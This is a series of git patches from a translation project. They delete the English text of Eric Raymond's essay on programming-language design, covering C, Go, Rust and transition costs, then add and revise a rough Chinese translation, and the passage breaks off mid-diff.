From 300061d988e7dafcc09761d000a98d6f5fc8b7a1 Mon Sep 17 00:00:00 2001
From: Valonia Kim <34000495+Valoniakim@users.noreply.github.com>
Date: Mon, 4 Dec 2017 15:55:46 +0800
Subject: [PATCH 001/371] Delete 20171118 Language engineering for great
justice.md
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Delete the source file
---
... Language engineering for great justice.md | 60 -------------------
1 file changed, 60 deletions(-)
delete mode 100644 sources/tech/20171118 Language engineering for great justice.md
diff --git a/sources/tech/20171118 Language engineering for great justice.md b/sources/tech/20171118 Language engineering for great justice.md
deleted file mode 100644
index 35d9bd854f..0000000000
--- a/sources/tech/20171118 Language engineering for great justice.md
+++ /dev/null
@@ -1,60 +0,0 @@
-Translating by ValoniaKim
-Language engineering for great justice
-============================================================
-
-Whole-systems engineering, when you get good at it, goes beyond being entirely or even mostly about technical optimizations. Every artifact we make is situated in a context of human action that widens out to the economics of its use, the sociology of its users, and the entirety of what Austrian economists call “praxeology”, the science of purposeful human behavior in its widest scope.
-
-This isn’t just abstract theory for me. When I wrote my papers on open-source development, they were exactly praxeology – they weren’t about any specific software technology or objective but about the context of human action within which technology is worked. An increase in praxeological understanding of technology can reframe it, leading to tremendous increases in human productivity and satisfaction, not so much because of changes in our tools but because of changes in the way we grasp them.
-
-In this, the third of my unplanned series of posts about the twilight of C and the huge changes coming as we actually begin to see forward into a new era of systems programming, I’m going to try to cash that general insight out into some more specific and generative ideas about the design of computer languages, why they succeed, and why they fail.
-
-In my last post I noted that every computer language is an embodiment of a relative-value claim, an assertion about the optimal tradeoff between spending machine resources and spending programmer time, all of this in a context where the cost of computing power steadily falls over time while programmer-time costs remain relatively stable or may even rise. I also highlighted the additional role of transition costs in pinning old tradeoff assertions into place. I described what language designers do as seeking a new optimum for present and near-future conditions.
-
-Now I’m going to focus on that last concept. A language designer has lots of possible moves in language-design space from where the state of the art is now. What kind of type system? GC or manual allocation? What mix of imperative, functional, or OO approaches? But in praxeological terms his choice is, I think, usually much simpler: attack a near problem or a far problem?
-
-“Near” and “far” are measured along the curves of falling hardware costs, rising software complexity, and increasing transition costs from existing languages. A near problem is one the designer can see right in front of him; a far problem is a set of conditions that can be seen coming but won’t necessarily arrive for some time. A near solution can be deployed immediately, to great practical effect, but may age badly as conditions change. A far solution is a bold bet that may smother under the weight of its own overhead before its future arrives, or never be adopted at all because moving to it is too expensive.
-
-Back at the dawn of computing, FORTRAN was a near-problem design, LISP a far-problem one. Assemblers are near solutions. Illustrating that the categories apply to non-general-purpose languages, also roff markup. Later in the game, PHP and Javascript. Far solutions? Oberon. Ocaml. ML. XML-Docbook. Academic languages tend to be far because the incentive structure around them rewards originality and intellectual boldness (note that this is a praxeological cause, not a technical one!). The failure mode of academic languages is predictable; high inward transition costs, nobody goes there, failure to achieve community critical mass sufficient for mainstream adoption, isolation, and stagnation. (That’s a potted history of LISP in one sentence, and I say that as an old LISP-head with a deep love for the language…)
-
-The failure modes of near designs are uglier. The best outcome to hope for is a graceful death and transition to a newer design. If they hang on (most likely to happen when transition costs out are high) features often get piled on them to keep them relevant, increasing complexity until they become teetering piles of cruft. Yes, C++, I’m looking at you. You too, Javascript. And (alas) Perl, though Larry Wall’s good taste mitigated the problem for many years – but that same good taste eventually moved him to blow up the whole thing for Perl 6.
-
-This way of thinking about language design encourages reframing the designer’s task in terms of two objectives. (1) Picking a sweet spot on the near-far axis away from you into the projected future; and (2) Minimizing inward transition costs from one or more existing languages so you co-opt their userbases. And now let’s talk about how C took over the world.
-
-There is no more breathtaking example than C of nailing the near-far sweet spot in the entire history of computing. All I need to do to prove this is point at its extreme longevity as a practical, mainstream language that successfully saw off many competitors for its roles over much of its range. That timespan has now passed about 35 years (counting from when it swamped its early competitors) and has not yet ended with any certainty.
-
-OK, you can attribute some of C’s persistence to inertia if you want, but what are you really adding to the explanation if you use the word “inertia”? What it means is exactly that nobody made an offer that actually covered the transition costs out of the language!
-
-Conversely, an underappreciated strength of the language was the low inward transition costs. C is an almost uniquely protean tool that, even at the beginning of its long reign, could readily accommodate programming habits acquired from languages as diverse as FORTRAN, Pascal, assemblers and LISP. I noticed back in the 1980s that I could often spot a new C programmer’s last language by his coding style, which was just the flip side of saying that C was damn good at gathering all those tribes unto itself.
-
-C++ also benefited from having low inward transition costs. Later, most new languages at least partly copied C syntax in order to minimize them. Notice what this does to the context of future language designs: it raises the value of being as C-like as possible in order to minimize inward transition costs from anywhere.
-
-Another way to minimize inward transition costs is to simply be ridiculously easy to learn, even to people with no prior programming experience. This, however, is remarkably hard to pull off. I evaluate that only one language – Python – has made the major leagues by relying on this quality. I mention it only in passing because it’s not a strategy I expect to see a _systems_ language execute successfully, though I’d be delighted to be wrong about that.
-
-So here we are in late 2017, and…the next part is going to sound to some easily-annoyed people like Go advocacy, but it isn’t. Go, itself, could turn out to fail in several easily imaginable ways. It’s troubling that the Go team is so impervious to some changes their user community is near-unanimously and rightly (I think) insisting it needs. Worst-case GC latency, or the throughput sacrifices made to lower it, could still turn out to drastically narrow the language’s application range.
-
-That said, there is a grand strategy expressed in the Go design that I think is right. To understand it, we need to review what the near problem for a C replacement is. As I noted in the prequels, it is rising defect rates as systems projects scale up – and specifically memory-management bugs because that category so dominates crash bugs and security exploits.
-
-We’ve now identified two really powerful imperatives for a C replacement: (1) solve the memory-management problem, and (2) minimize inward-transition costs from C. And the history – the praxeological context – of programming languages tells us that if a C successor candidate doesn’t address the transition-cost problem effectively enough, it almost doesn’t matter how good a job it does on anything else. Conversely, a C successor that _does_ address transition costs well buys itself a lot of slack for not being perfect in other ways.
-
-This is what Go does. It’s not a theoretical jewel; it has annoying limitations; GC latency presently limits how far down the stack it can be pushed. But what it is doing is replicating the Unix/C infective strategy of being easy-entry and _good enough_ to propagate faster than alternatives that, if it didn’t exist, would look like better far bets.
-
-Of course, the proboscid in the room when I say that is Rust. Which is, in fact, positioning itself as the better far bet. I’ve explained in previous installments why I don’t think it’s really ready to compete yet. The TIOBE and PYPL indices agree; it’s never made the TIOBE top 20 and on both indices does quite poorly against Go.
-
-Where Rust will be in five years is a different question, of course. My advice to the Rust community, if they care, is to pay some serious attention to the transition-cost problem. My personal experience says the C to Rust energy barrier is _[nasty][2]_ . Code-lifting tools like Corrode won’t solve it if all they do is map C to unsafe Rust, and if there were an easy way to automate ownership/lifetime annotations they wouldn’t be needed at all – the compiler would just do that for you. I don’t know what a solution would look like, here, but I think they better find one.
-
-I will finally note that Ken Thompson has a history of designs that look like minimal solutions to near problems but turn out to have an amazing quality of openness to the future, the capability to _be improved_ . Unix is like this, of course. It makes me very cautious about supposing that any of the obvious annoyances in Go that look like future-blockers to me (like, say, the lack of generics) actually are. Because for that to be true, I’d have to be smarter than Ken, which is not an easy thing to believe.
-
---------------------------------------------------------------------------------
-
-via: http://esr.ibiblio.org/?p=7745
-
-作者:[Eric Raymond ][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://esr.ibiblio.org/?author=2
-[1]:http://esr.ibiblio.org/?author=2
-[2]:http://esr.ibiblio.org/?p=7711&cpage=1#comment-1913931
-[3]:http://esr.ibiblio.org/?p=7745
From 2f61d8d46e7cb305422db648c8d6eb47cb73cd74 Mon Sep 17 00:00:00 2001
From: Valonia Kim <34000495+Valoniakim@users.noreply.github.com>
Date: Mon, 4 Dec 2017 16:02:20 +0800
Subject: [PATCH 002/371] Create Language engineering for great justice
Translated by ValoniaK
---
.../Language engineering for great justice | 24 +++++++++++++++++++
1 file changed, 24 insertions(+)
create mode 100644 translated/tech/Language engineering for great justice
diff --git a/translated/tech/Language engineering for great justice b/translated/tech/Language engineering for great justice
new file mode 100644
index 0000000000..d26f9319bd
--- /dev/null
+++ b/translated/tech/Language engineering for great justice
@@ -0,0 +1,24 @@
+最合理的语言工程模式
+当你熟练掌握一体化工程技术时,你就会发现它逐渐超过了技术优化的层面。我们制作的每件手工艺品都在一个大环境背景下,在这个环境中,人类的行为逐渐突破了经济意义,社会学意义,达到了奥地利经济学家所称的“人类行为学”,这是目的明确的人类行为所能达到的最大范围。
+对我来说这并不只是抽象理论。当我在开源发展项目中编写时,我的行为就十分符合人类行为学的理论,这行为不是针对任何特定的软件技术或某个客观事物,它指的是在开发科技的过程中人类行为的背景环境。从人类行为学角度对科技进行的解读不断增加,大量的这种解读可以重塑科技框架,带来人类生产力和满足感的极大幅度增长,而这并不是由于我们换了工具,而是在于我们改变了掌握它们的方式。
+在这个背景下,我在第三篇额外的文章中谈到了 C 语言的衰退和正在到来的巨大改变,而我们也确实能够感受到系统编程的新时代的到来,在这个时刻,我决定把我之前有的大体的预感具象化为更加具体的,更实用的点子,它们主要是关于计算机语言设计的分析,例如为什么他们会成功,或为什么他们会失败。
+在我最近的一篇文章中,我写道:所有计算机语言都是对机器资源的成本和程序员工作成本的相对权衡的结果,和对其相对价值的体现。这些都是在一个计算能力成本不断下降但程序员工作成本不减反增的背景下产生的。我还强调了转化成本在使原有交易主张适用于当下环境中的新增角色。在文中我将编程人员描述为一个寻找今后最适方案的探索者。
+现在我要讲一讲最后一点。以现有水平为起点,一个语言工程师有极大可能通过多种方式推动语言设计的发展。通过什么系统呢? GC 还是人工分配?使用何种配置,命令式语言,函数程式语言或是面向对象语言?但是从人类行为学的角度来说,我认为它的形式会更简洁,也许只是选择解决长期问题还是短期问题?
+所谓的“远”“近”之分,是指硬件成本的逐渐降低,软件复杂程度的上升和由现有语言向其他语言转化的成本的增加,根据它们的变化曲线所做出的判断。短期问题指编程人员眼下发现的问题,长期问题指可预见的一系列情况,但它们一段时间内不会到来。针对近期问题所做出的部署需要非常及时且有效,但随着情况的变化,短期解决方案有可能很快就不适用了。而长期的解决方案可能因其过于超前而夭折,或因其代价过高无法被接受。
+在计算机刚刚面世的时候, FORTRAN 是近期亟待解决的问题, LISP 是远期问题。汇编语言是短期解决方案,图解说明非通用语言的分类应用,还有关门电阻不断上涨的成本。随着计算机技术的发展,PHP 和 Javascript逐渐应用于游戏中。至于长期的解决方案? Oberon , Ocaml , ML , XML-Docbook 都可以。 他们形成的激励机制带来了大量具有突破性和原创性的想法,事态蓬勃但未形成体系,那个时候距离专业语言的面世还很远,(值得注意的是这些想法的出现都是人类行为学中的因果,并非由于某种技术)。专业语言会失败,这是显而易见的,它的转入成本高昂,让大部分人望而却步,因此不能没能达到能够让主流群体接受的水平,被孤立,被搁置。这也是 LISP 不为人知的的过去,作为前 LISP 管理层人员,出于对它深深的爱,我为你们讲述了这段历史。
+如果短期解决方案出现故障,它的后果更加惨不忍睹,最好的结果是期待一个相对体面的失败,好转换到另一个设计方案。(通常在转化成本较高时)如果他们执意继续,通常造成众多方案相互之间藕断丝连,形成一个不断扩张的复合体,一直维持到不能运转下去,变成一堆摇摇欲坠的杂物。是的,我说的就是 C++ 语言,还有 Java 描述语言,(唉)还有 Perl,虽然 Larry Wall 的好品味成功地让他维持了很多年,问题一直没有爆发,但在 Perl 6 发行时,他的好品味最终引爆了整个问题。
+这种思考角度激励了编程人员向着两个不同的目的重新塑造语言设计: ①以远近为轴,在自身和预计的未来之间选取一个最适点,然后 ②降低由一种或多种语言转化为自身语言的转入成本,这样你就可以吸纳他们的用户群。接下来我会讲讲 C 语言是怎样占领全世界的。
+在整个计算机发展史中,没有谁能比 C 语言完美地把握最适点的选取了,我要做的只是证明这一点,作为一种实用的主流语言, C 语言有着更长的寿命,它目睹了无数个竞争者的兴衰,但它的地位仍旧不可取代。从淘汰它的第一个竞争者到现在已经过了 35 年,但看起来C语言的终结仍旧不会到来。
+当然,如果你愿意的话,可以把 C 语言的持久存在归功于人类的文化惰性,但那是对“文化惰性”这个词的曲解, C 语言一直得以延续的真正原因是没有人提供足够的转化费用!
+相反的, C 语言低廉的内部转化费用未得到应有的重视,C 语言是如此的千变万化,从它漫长统治时期的初期开始,它就可以适用于多种语言如 FORTRAN , Pascal , 汇编语言和 LISP 的编程习惯。在二十世纪八十年代我就注意到,我可以根据编程人员的编码风格判断出他的母语是什么,这也从另一方面证明了C 语言的魅力能够吸引全世界的人使用它。
+C++ 语言同样胜在它低廉的转化费用。很快,大部分新兴的语言为了降低自身转化费用,纷纷参考 C 语言语法。请注意这给未来的语言设计环境带来了什么影响:它尽可能地提高了 C-like 语言的价值,以此来降低其他语言转化为 C 语言的转化成本。
+另一种降低转入成本的方法十分简单,即使没接触过编程的人都能学会,但这种方法很难完成。我认为唯一使用了这种方法的 Python就是靠这种方法进入了职业比赛。对这个方法我一带而过,是因为它并不是我希望看到的,顺利执行的系统语言战略,虽然我很希望它不是那样的。
+今天我们在2017年年底聚集在这里,下一项我们应该为某些暴躁的团体发声,如 Go 团队,但事实并非如此。 Go 这个项目漏洞百出,我甚至可以想象出它失败的各种可能,Go 团队太过固执独断,即使几乎整个用户群体都认为 Go 需要做出改变了,Go 团队也无动于衷,这是个大问题。 一旦发生故障, GC 发生延迟或者用牺牲生产量来弥补延迟,但无论如何,它都会严重影响到这种语言的应用,大幅缩小这种语言的适用范围。
+即便如此,在 Go 的设计中,还是有一个我颇为认同的远大战略目标,想要理解这个目标,我们需要回想一下如果想要取代 C 语言,要面临的短期问题是什么。同我之前提到的,随着项目计划的不断扩张,故障率也在持续上升,这其中内存管理方面的故障尤其多,而内存管理一直是崩溃漏洞和安全漏洞的高发领域。
+我们现在已经知道了两件十分中重要的紧急任务,要想取代 C 语言,首先要先做到这两点:(1)解决内存管理问题;(2)降低由 C 语言向本语言转化时所需的转入成本。纵观编程语言的历史——从人类行为学的角度来看,作为 C 语言的准替代者,如果不能有效解决转入成本过高这个问题,那他们所做的其他部分做得再好都不算数。相反的,如果他们把转入成本过高这个问题解决地很好,即使他们其他部分做的不是最好的,人们也不会对他们吹毛求疵。
+这正是 Go 的做法,但这个理论并不是完美无瑕的,它也有局限性。目前 GC 延迟限制了它的发展,但 Go 现在选择照搬 Unix 下 C 语言的传染战略,让自身语言变成易于转入,便于传播的语言,其繁殖速度甚至快于替代品。但从长远角度看,这并不是个好办法。
+当然, Rust 语言的不足是个十分明显的问题,我们不应当回避它。而它,正将自己定位为适用于长远计划的选择。在之前的部分中我已经谈到了为什么我觉得它还不完美,Rust 语言在 TIBOE 和PYPL 指数上的成就也证明了我的说法,在 TIBOE 上 Rust 从来没有进过前20名,在 PYPL 指数上它的成就也比 Go 差很多。
+五年后 Rust 能发展的怎样还是个问题,如果他们愿意改变,我建议他们重视转入成本问题。以我个人经历来说,由 C 语言转入 Rust 语言的能量壁垒使人望而却步。如果编码提升工具比如 Corrode 只能把 C 语言映射为不稳定的 Rust 语言,但不能解决能量壁垒的问题;或者如果有更简单的方法能够自动注释所有权或试用期,人们也不再需要它们了——这些问题编译器就能够解决。目前我不知道怎样解决这个问题,但我觉得他们最好找出解决方案。
+在最后我想强调一下,虽然在 Ken Thompson 的设计经历中,他看起来很少解决短期问题,但他对未来有着极大的包容性,并且这种包容性还在不断提升。当然 Unix 也是这样的, 它让我不禁暗自揣测,让我认为 Go 语言中令人不快的地方都其实是他们未来事业的基石(例如缺乏泛型)。如果要确认这件事是真假,我需要比 Ken 还要聪明,但这并不是一件容易让人相信的事情。
+
+
From 81aee45a065eef827369d23fea71e6f37469c17b Mon Sep 17 00:00:00 2001
From: Valonia Kim <34000495+Valoniakim@users.noreply.github.com>
Date: Mon, 4 Dec 2017 19:09:44 +0800
Subject: [PATCH 003/371] Language engineering for great justice.
Translated by Valoniakim
---
.../Language engineering for great justice. | 24 +++++++++++++++++++
1 file changed, 24 insertions(+)
create mode 100644 translated/tech/Language engineering for great justice.
diff --git a/translated/tech/Language engineering for great justice. b/translated/tech/Language engineering for great justice.
new file mode 100644
index 0000000000..7f982e0d19
--- /dev/null
+++ b/translated/tech/Language engineering for great justice.
@@ -0,0 +1,24 @@
+# 最合理的语言工程模式
+## 当你熟练掌握一体化工程技术时,你就会发现它逐渐超过了技术优化的层面。我们制作的每件手工艺品都在一个大环境背景下,在这个环境中,人类的行为逐渐突破了经济意义,社会学意义,达到了奥地利经济学家所称的“人类行为学”,这是目的明确的人类行为所能达到的最大范围。
+## 对我来说这并不只是抽象理论。当我在开源发展项目中编写时,我的行为就十分符合人类行为学的理论,这行为不是针对任何特定的软件技术或某个客观事物,它指的是在开发科技的过程中人类行为的背景环境。从人类行为学角度对科技进行的解读不断增加,大量的这种解读可以重塑科技框架,带来人类生产力和满足感的极大幅度增长,而这并不是由于我们换了工具,而是在于我们改变了掌握它们的方式。
+## 在这个背景下,我在第三篇额外的文章中谈到了 C 语言的衰退和正在到来的巨大改变,而我们也确实能够感受到系统编程的新时代的到来,在这个时刻,我决定把我之前有的大体的预感具象化为更加具体的,更实用的点子,它们主要是关于计算机语言设计的分析,例如为什么他们会成功,或为什么他们会失败。
+## 在我最近的一篇文章中,我写道:所有计算机语言都是对机器资源的成本和程序员工作成本的相对权衡的结果,和对其相对价值的体现。这些都是在一个计算能力成本不断下降但程序员工作成本不减反增的背景下产生的。我还强调了转化成本在使原有交易主张适用于当下环境中的新增角色。在文中我将编程人员描述为一个寻找今后最适方案的探索者。
+## 现在我要讲一讲最后一点。以现有水平为起点,一个语言工程师有极大可能通过多种方式推动语言设计的发展。通过什么系统呢? GC 还是人工分配?使用何种配置,命令式语言,函数程式语言或是面向对象语言?但是从人类行为学的角度来说,我认为它的形式会更简洁,也许只是选择解决长期问题还是短期问题?
+## 所谓的“远”“近”之分,是指硬件成本的逐渐降低,软件复杂程度的上升和由现有语言向其他语言转化的成本的增加,根据它们的变化曲线所做出的判断。短期问题指编程人员眼下发现的问题,长期问题指可预见的一系列情况,但它们一段时间内不会到来。针对近期问题所做出的部署需要非常及时且有效,但随着情况的变化,短期解决方案有可能很快就不适用了。而长期的解决方案可能因其过于超前而夭折,或因其代价过高无法被接受。
+## 在计算机刚刚面世的时候, FORTRAN 是近期亟待解决的问题, LISP 是远期问题。汇编语言是短期解决方案,图解说明非通用语言的分类应用,还有关门电阻不断上涨的成本。随着计算机技术的发展,PHP 和 Javascript逐渐应用于游戏中。至于长期的解决方案? Oberon , Ocaml , ML , XML-Docbook 都可以。 他们形成的激励机制带来了大量具有突破性和原创性的想法,事态蓬勃但未形成体系,那个时候距离专业语言的面世还很远,(值得注意的是这些想法的出现都是人类行为学中的因果,并非由于某种技术)。专业语言会失败,这是显而易见的,它的转入成本高昂,让大部分人望而却步,因此不能没能达到能够让主流群体接受的水平,被孤立,被搁置。这也是 LISP 不为人知的的过去,作为前 LISP 管理层人员,出于对它深深的爱,我为你们讲述了这段历史。
+## 如果短期解决方案出现故障,它的后果更加惨不忍睹,最好的结果是期待一个相对体面的失败,好转换到另一个设计方案。(通常在转化成本较高时)如果他们执意继续,通常造成众多方案相互之间藕断丝连,形成一个不断扩张的复合体,一直维持到不能运转下去,变成一堆摇摇欲坠的杂物。是的,我说的就是 C++ 语言,还有 Java 描述语言,(唉)还有 Perl,虽然 Larry Wall 的好品味成功地让他维持了很多年,问题一直没有爆发,但在 Perl 6 发行时,他的好品味最终引爆了整个问题。
+## 这种思考角度激励了编程人员向着两个不同的目的重新塑造语言设计: ①以远近为轴,在自身和预计的未来之间选取一个最适点,然后 ②降低由一种或多种语言转化为自身语言的转入成本,这样你就可以吸纳他们的用户群。接下来我会讲讲 C 语言是怎样占领全世界的。
+## 在整个计算机发展史中,没有谁能比 C 语言完美地把握最适点的选取了,我要做的只是证明这一点,作为一种实用的主流语言, C 语言有着更长的寿命,它目睹了无数个竞争者的兴衰,但它的地位仍旧不可取代。从淘汰它的第一个竞争者到现在已经过了 35 年,但看起来C语言的终结仍旧不会到来。
+## 当然,如果你愿意的话,可以把 C 语言的持久存在归功于人类的文化惰性,但那是对“文化惰性”这个词的曲解, C 语言一直得以延续的真正原因是没有人提供足够的转化费用!
+## 相反的, C 语言低廉的内部转化费用未得到应有的重视,C 语言是如此的千变万化,从它漫长统治时期的初期开始,它就可以适用于多种语言如 FORTRAN , Pascal , 汇编语言和 LISP 的编程习惯。在二十世纪八十年代我就注意到,我可以根据编程人员的编码风格判断出他的母语是什么,这也从另一方面证明了C 语言的魅力能够吸引全世界的人使用它。
+## C++ 语言同样胜在它低廉的转化费用。很快,大部分新兴的语言为了降低自身转化费用,纷纷参考 C 语言语法。请注意这给未来的语言设计环境带来了什么影响:它尽可能地提高了 C-like 语言的价值,以此来降低其他语言转化为 C 语言的转化成本。
+## 另一种降低转入成本的方法十分简单,即使没接触过编程的人都能学会,但这种方法很难完成。我认为唯一使用了这种方法的 Python就是靠这种方法进入了职业比赛。对这个方法我一带而过,是因为它并不是我希望看到的,顺利执行的系统语言战略,虽然我很希望它不是那样的。
+## 今天我们在2017年年底聚集在这里,下一项我们应该为某些暴躁的团体发声,如 Go 团队,但事实并非如此。 Go 这个项目漏洞百出,我甚至可以想象出它失败的各种可能,Go 团队太过固执独断,即使几乎整个用户群体都认为 Go 需要做出改变了,Go 团队也无动于衷,这是个大问题。 一旦发生故障, GC 发生延迟或者用牺牲生产量来弥补延迟,但无论如何,它都会严重影响到这种语言的应用,大幅缩小这种语言的适用范围。
+## 即便如此,在 Go 的设计中,还是有一个我颇为认同的远大战略目标,想要理解这个目标,我们需要回想一下如果想要取代 C 语言,要面临的短期问题是什么。同我之前提到的,随着项目计划的不断扩张,故障率也在持续上升,这其中内存管理方面的故障尤其多,而内存管理一直是崩溃漏洞和安全漏洞的高发领域。
+## 我们现在已经知道了两件十分中重要的紧急任务,要想取代 C 语言,首先要先做到这两点:(1)解决内存管理问题;(2)降低由 C 语言向本语言转化时所需的转入成本。纵观编程语言的历史——从人类行为学的角度来看,作为 C 语言的准替代者,如果不能有效解决转入成本过高这个问题,那他们所做的其他部分做得再好都不算数。相反的,如果他们把转入成本过高这个问题解决地很好,即使他们其他部分做的不是最好的,人们也不会对他们吹毛求疵。
+## 这正是 Go 的做法,但这个理论并不是完美无瑕的,它也有局限性。目前 GC 延迟限制了它的发展,但 Go 现在选择照搬 Unix 下 C 语言的传染战略,让自身语言变成易于转入,便于传播的语言,其繁殖速度甚至快于替代品。但从长远角度看,这并不是个好办法。
+## 当然, Rust 语言的不足是个十分明显的问题,我们不应当回避它。而它,正将自己定位为适用于长远计划的选择。在之前的部分中我已经谈到了为什么我觉得它还不完美,Rust 语言在 TIBOE 和PYPL 指数上的成就也证明了我的说法,在 TIBOE 上 Rust 从来没有进过前20名,在 PYPL 指数上它的成就也比 Go 差很多。
+## 五年后 Rust 能发展的怎样还是个问题,如果他们愿意改变,我建议他们重视转入成本问题。以我个人经历来说,由 C 语言转入 Rust 语言的能量壁垒使人望而却步。如果编码提升工具比如 Corrode 只能把 C 语言映射为不稳定的 Rust 语言,但不能解决能量壁垒的问题;或者如果有更简单的方法能够自动注释所有权或试用期,人们也不再需要它们了——这些问题编译器就能够解决。目前我不知道怎样解决这个问题,但我觉得他们最好找出解决方案。
+## 在最后我想强调一下,虽然在 Ken Thompson 的设计经历中,他看起来很少解决短期问题,但他对未来有着极大的包容性,并且这种包容性还在不断提升。当然 Unix 也是这样的, 它让我不禁暗自揣测,让我认为 Go 语言中令人不快的地方都其实是他们未来事业的基石(例如缺乏泛型)。如果要确认这件事是真假,我需要比 Ken 还要聪明,但这并不是一件容易让人相信的事情。
+
+
From 85931826bbca0c9ec3188689d35449eaa478516f Mon Sep 17 00:00:00 2001
From: Valonia Kim <34000495+Valoniakim@users.noreply.github.com>
Date: Mon, 4 Dec 2017 20:11:40 +0800
Subject: [PATCH 004/371] Update Language engineering for great justice.
Translated by Valoniakim
---
.../Language engineering for great justice. | 83 +++++++++++++------
1 file changed, 59 insertions(+), 24 deletions(-)
diff --git a/translated/tech/Language engineering for great justice. b/translated/tech/Language engineering for great justice.
index 7f982e0d19..301337b11c 100644
--- a/translated/tech/Language engineering for great justice.
+++ b/translated/tech/Language engineering for great justice.
@@ -1,24 +1,59 @@
-# 最合理的语言工程模式
-## 当你熟练掌握一体化工程技术时,你就会发现它逐渐超过了技术优化的层面。我们制作的每件手工艺品都在一个大环境背景下,在这个环境中,人类的行为逐渐突破了经济意义,社会学意义,达到了奥地利经济学家所称的“人类行为学”,这是目的明确的人类行为所能达到的最大范围。
-## 对我来说这并不只是抽象理论。当我在开源发展项目中编写时,我的行为就十分符合人类行为学的理论,这行为不是针对任何特定的软件技术或某个客观事物,它指的是在开发科技的过程中人类行为的背景环境。从人类行为学角度对科技进行的解读不断增加,大量的这种解读可以重塑科技框架,带来人类生产力和满足感的极大幅度增长,而这并不是由于我们换了工具,而是在于我们改变了掌握它们的方式。
-## 在这个背景下,我在第三篇额外的文章中谈到了 C 语言的衰退和正在到来的巨大改变,而我们也确实能够感受到系统编程的新时代的到来,在这个时刻,我决定把我之前有的大体的预感具象化为更加具体的,更实用的点子,它们主要是关于计算机语言设计的分析,例如为什么他们会成功,或为什么他们会失败。
-## 在我最近的一篇文章中,我写道:所有计算机语言都是对机器资源的成本和程序员工作成本的相对权衡的结果,和对其相对价值的体现。这些都是在一个计算能力成本不断下降但程序员工作成本不减反增的背景下产生的。我还强调了转化成本在使原有交易主张适用于当下环境中的新增角色。在文中我将编程人员描述为一个寻找今后最适方案的探索者。
-## 现在我要讲一讲最后一点。以现有水平为起点,一个语言工程师有极大可能通过多种方式推动语言设计的发展。通过什么系统呢? GC 还是人工分配?使用何种配置,命令式语言,函数程式语言或是面向对象语言?但是从人类行为学的角度来说,我认为它的形式会更简洁,也许只是选择解决长期问题还是短期问题?
-## 所谓的“远”“近”之分,是指硬件成本的逐渐降低,软件复杂程度的上升和由现有语言向其他语言转化的成本的增加,根据它们的变化曲线所做出的判断。短期问题指编程人员眼下发现的问题,长期问题指可预见的一系列情况,但它们一段时间内不会到来。针对近期问题所做出的部署需要非常及时且有效,但随着情况的变化,短期解决方案有可能很快就不适用了。而长期的解决方案可能因其过于超前而夭折,或因其代价过高无法被接受。
-## 在计算机刚刚面世的时候, FORTRAN 是近期亟待解决的问题, LISP 是远期问题。汇编语言是短期解决方案,图解说明非通用语言的分类应用,还有关门电阻不断上涨的成本。随着计算机技术的发展,PHP 和 Javascript逐渐应用于游戏中。至于长期的解决方案? Oberon , Ocaml , ML , XML-Docbook 都可以。 他们形成的激励机制带来了大量具有突破性和原创性的想法,事态蓬勃但未形成体系,那个时候距离专业语言的面世还很远,(值得注意的是这些想法的出现都是人类行为学中的因果,并非由于某种技术)。专业语言会失败,这是显而易见的,它的转入成本高昂,让大部分人望而却步,因此不能没能达到能够让主流群体接受的水平,被孤立,被搁置。这也是 LISP 不为人知的的过去,作为前 LISP 管理层人员,出于对它深深的爱,我为你们讲述了这段历史。
-## 如果短期解决方案出现故障,它的后果更加惨不忍睹,最好的结果是期待一个相对体面的失败,好转换到另一个设计方案。(通常在转化成本较高时)如果他们执意继续,通常造成众多方案相互之间藕断丝连,形成一个不断扩张的复合体,一直维持到不能运转下去,变成一堆摇摇欲坠的杂物。是的,我说的就是 C++ 语言,还有 Java 描述语言,(唉)还有 Perl,虽然 Larry Wall 的好品味成功地让他维持了很多年,问题一直没有爆发,但在 Perl 6 发行时,他的好品味最终引爆了整个问题。
-## 这种思考角度激励了编程人员向着两个不同的目的重新塑造语言设计: ①以远近为轴,在自身和预计的未来之间选取一个最适点,然后 ②降低由一种或多种语言转化为自身语言的转入成本,这样你就可以吸纳他们的用户群。接下来我会讲讲 C 语言是怎样占领全世界的。
-## 在整个计算机发展史中,没有谁能比 C 语言完美地把握最适点的选取了,我要做的只是证明这一点,作为一种实用的主流语言, C 语言有着更长的寿命,它目睹了无数个竞争者的兴衰,但它的地位仍旧不可取代。从淘汰它的第一个竞争者到现在已经过了 35 年,但看起来C语言的终结仍旧不会到来。
-## 当然,如果你愿意的话,可以把 C 语言的持久存在归功于人类的文化惰性,但那是对“文化惰性”这个词的曲解, C 语言一直得以延续的真正原因是没有人提供足够的转化费用!
-## 相反的, C 语言低廉的内部转化费用未得到应有的重视,C 语言是如此的千变万化,从它漫长统治时期的初期开始,它就可以适用于多种语言如 FORTRAN , Pascal , 汇编语言和 LISP 的编程习惯。在二十世纪八十年代我就注意到,我可以根据编程人员的编码风格判断出他的母语是什么,这也从另一方面证明了C 语言的魅力能够吸引全世界的人使用它。
-## C++ 语言同样胜在它低廉的转化费用。很快,大部分新兴的语言为了降低自身转化费用,纷纷参考 C 语言语法。请注意这给未来的语言设计环境带来了什么影响:它尽可能地提高了 C-like 语言的价值,以此来降低其他语言转化为 C 语言的转化成本。
-## 另一种降低转入成本的方法十分简单,即使没接触过编程的人都能学会,但这种方法很难完成。我认为唯一使用了这种方法的 Python就是靠这种方法进入了职业比赛。对这个方法我一带而过,是因为它并不是我希望看到的,顺利执行的系统语言战略,虽然我很希望它不是那样的。
-## 今天我们在2017年年底聚集在这里,下一项我们应该为某些暴躁的团体发声,如 Go 团队,但事实并非如此。 Go 这个项目漏洞百出,我甚至可以想象出它失败的各种可能,Go 团队太过固执独断,即使几乎整个用户群体都认为 Go 需要做出改变了,Go 团队也无动于衷,这是个大问题。 一旦发生故障, GC 发生延迟或者用牺牲生产量来弥补延迟,但无论如何,它都会严重影响到这种语言的应用,大幅缩小这种语言的适用范围。
-## 即便如此,在 Go 的设计中,还是有一个我颇为认同的远大战略目标,想要理解这个目标,我们需要回想一下如果想要取代 C 语言,要面临的短期问题是什么。同我之前提到的,随着项目计划的不断扩张,故障率也在持续上升,这其中内存管理方面的故障尤其多,而内存管理一直是崩溃漏洞和安全漏洞的高发领域。
